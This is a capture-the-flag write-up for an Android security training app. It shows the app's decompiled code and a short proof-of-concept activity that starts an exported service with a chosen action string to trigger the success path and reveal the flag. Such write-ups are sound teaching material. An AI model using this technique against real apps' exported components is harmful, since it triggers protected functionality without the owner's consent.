0xAnan's Dojo

Flag 24 - Basic service start

2 min read

Challenge Requirments

Start a Service

Analysis

Flag24Activity

public class Flag24Activity extends AppCompactActivity {  
    public Flag24Activity() {  
        this.name = "Flag 24 - Basic service start";  
        this.tag = "Service";  
        this.tagColor = R.color.blue;  
        this.flag = "LyawUjxPt4tx+lYns1wrupDU3YaQ2t8bJmYW6BA+QUk=";  
        this.description = Flag24Service.class.getCanonicalName();  
    }  
  
    @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity  
    protected void onCreate(Bundle bundle) {  
        super.onCreate(bundle);  
        this.f = new LogHelper(this);  
        Intent intent = getIntent();  
        String stringExtra = intent.getStringExtra("secret");  
        this.f.addTag(intent.getAction());  
        if (Flag24Service.secret.equals(stringExtra)) {  
            success(this);  
        }  
    }  
}

Upon reviewing the code we notice that to fire success method it compares the secret extra with a secret value in Flag24Service so let’s check the code of it

Flag24Service

public class Flag24Service extends Service {  
    public static String secret = UUID.randomUUID().toString();  
  
    @Override // android.app.Service  
    public int onStartCommand(Intent intent, int i, int i2) {  
        Log.i("Flag24Service", Utils.dumpIntent(this, intent));  
        if (intent.getAction().equals("io.hextree.services.START_FLAG24_SERVICE")) {  
            success();  
        }  
        return super.onStartCommand(intent, i, i2);  
    }  
  
    private void success() {  
        Intent intent = new Intent(this, (Class<?>) Flag24Activity.class);  
        intent.setAction("io.hextree.services.START_FLAG24_SERVICE");  
        intent.putExtra("secret", secret);  
        intent.addFlags(268468224);  
        intent.putExtra("hideIntent", true);  
        startActivity(intent);  
    }  
  
    @Override // android.app.Service  
    public IBinder onBind(Intent intent) {  
        throw new UnsupportedOperationException("Not yet implemented");  
    }  
}

As we can see there’s no way for us to know the secret as it’s random:

public static String secret = UUID.randomUUID().toString();

But we can also fire success from here if the action is equals to io.hextree.services.START_FLAG24_SERVICE so let’s create the poc for it!

Creating the POC

public class Flag24 extends AppCompatActivity {
	@Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_flag24);
        getSupportActionBar().setTitle("Flag 24");
 
        Button button = findViewById(R.id.button_flag24);
        button.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Log.v("Tensai-POC", "Getting Flag 24");
                Intent serviceIntent = new Intent();
                serviceIntent.setAction("io.hextree.services.START_FLAG24_SERVICE");
                serviceIntent.setComponent(
                        new ComponentName("io.hextree.attacksurface",
                                "io.hextree.attacksurface.services.Flag24Service"));
                startService(serviceIntent);
            }
        });
    }
}

The code is pretty simple we just send a service to Flag24Service with the needed action, I faced some issues at first as the app wasn’t run in the background so make sure your target app is running in your background!

Flag

HXT{basic-service-ha98sl}